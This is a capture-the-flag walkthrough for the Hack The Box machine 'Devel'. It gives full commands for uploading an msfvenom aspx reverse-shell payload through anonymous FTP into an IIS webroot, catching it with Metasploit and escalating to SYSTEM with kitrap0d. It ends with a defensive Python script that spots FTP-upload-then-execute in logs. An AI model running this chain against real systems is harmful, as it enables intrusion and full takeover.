HTB - 4. Devel
1. Scan the box:

   ```
   nmap -T4 -p- -A 10.10.10.5
   ```

   This shows 22 (FTP) with anonymous login (to the webroot directory?) and 80 (HTTP) running Microsoft IIS httpd 7.5.

2. Go to http://10.10.10.5, which is a default web page.

3. Run dirbuster (dirb and gobuster are popular as well) against http://10.10.10.5:80 with the wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, and change the file extensions to asm, asmx, asp, aspx, txt because the server is IIS.

4. FTP: upload a file to the server.

   ```
   ftp 10.10.10.5
   anonymous
   anonymous
   ls
   pwd
   put dog.jpg
   ls
   ```

   Go to http://10.10.10.5/dog.jpg and it loads, so anonymous FTP writes land in the webroot.

5. msfvenom: create a reverse_tcp payload.

   ```
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspx
   ```

   Open up a port to listen on:

   ```
   sudo msfconsole
   use exploit/multi/handler
   options
   set payload windows/meterpreter/reverse_tcp
   options
   set LHOST 10.10.14.24
   run
   ```

6. Back to FTP:

   ```
   binary      <-- switch to binary instead of ASCII
   put ex.aspx
   ```

   Go to http://10.10.10.5/ex.aspx and the shell pops.

7. Hacked. In the meterpreter session:

   ```
   sysinfo
   getuid
   ```

   Result: we are `IIS APPPOOL\Web`, not authority system. `getsystem` failed.

   Check which privilege escalation exploits might work:

   ```
   background
   search suggester
   use post/multi/recon/local_exploit_suggester
   options
   set SESSION 1
   run
   ```

   Run the privilege escalation:

   ```
   use exploit/windows/local/ms10_015_kitrap0d
   options
   set SESSION 1
   options
   run
   options
   set lhost 10.10.14.24   <-- make sure you are using the right interface
   set lport 4445          <-- need a different port since 4444 is already in use by the first handler
   options
   run
   ```

   Result: shell popped with authority system.
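The defender's view of steps 4 and 6: an anonymous FTP write into the webroot followed by an HTTP request for the same script file is the whole chain, and it is visible in the server's own logs. The script below is an added example (not part of this writeup); its two logs are constructed W3C-style samples and their column order is an assumption, since real IIS logs declare their own `#Fields:` header, which the parser reads.

```python
"""Added example (not from the writeup): flag files with executable extensions
stored over FTP and then requested over HTTP shortly afterwards. The two logs
are constructed W3C-style samples; real IIS logs supply their own '#Fields:'
header, which parse_w3c() reads, so the column order here is only an assumption."""
import os
from datetime import datetime

SCRIPT_EXT = {".asp", ".aspx", ".asmx", ".ashx"}  # handlers IIS will execute
ANON_USERS = {"anonymous", "ftp"}

FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-01 10:00:05 10.10.14.24 anonymous STOR /dog.jpg 226
2024-01-01 10:00:20 10.10.14.24 anonymous STOR /ex.aspx 226
"""
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:10 10.10.14.24 GET /dog.jpg 200
2024-01-01 10:00:30 10.10.14.24 GET /ex.aspx 200
2024-01-01 10:05:00 10.10.14.50 GET /welcome.png 200
"""

def parse_w3c(text):
    """Rows of a W3C extended log as dicts keyed by the '#Fields:' names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def _ts(row):
    return datetime.fromisoformat(f"{row['date']} {row['time']}")

def find_upload_then_execute(ftp_text, http_text, window_s=3600):
    """STOR of a script file followed within window_s by a request for the
    same path. An anonymous uploader marks the finding as high severity."""
    hits = []
    for up in parse_w3c(ftp_text):
        if up["cs-method"] != "STOR" or \
                os.path.splitext(up["cs-uri-stem"])[1].lower() not in SCRIPT_EXT:
            continue
        for req in parse_w3c(http_text):
            delay = (_ts(req) - _ts(up)).total_seconds()
            if req["cs-uri-stem"].lower() == up["cs-uri-stem"].lower() \
                    and 0 <= delay <= window_s:
                hits.append({"path": up["cs-uri-stem"], "upload_ip": up["c-ip"],
                             "request_ip": req["c-ip"], "delay_s": delay,
                             "anonymous": up["cs-username"].lower() in ANON_USERS})
    return hits
```

On the sample data only `/ex.aspx` is reported (the `.jpg` upload is ignored), which is the event that should page someone; the durable fix is to stop anonymous FTP from writing into any directory IIS serves, or to strip script handlers from that directory.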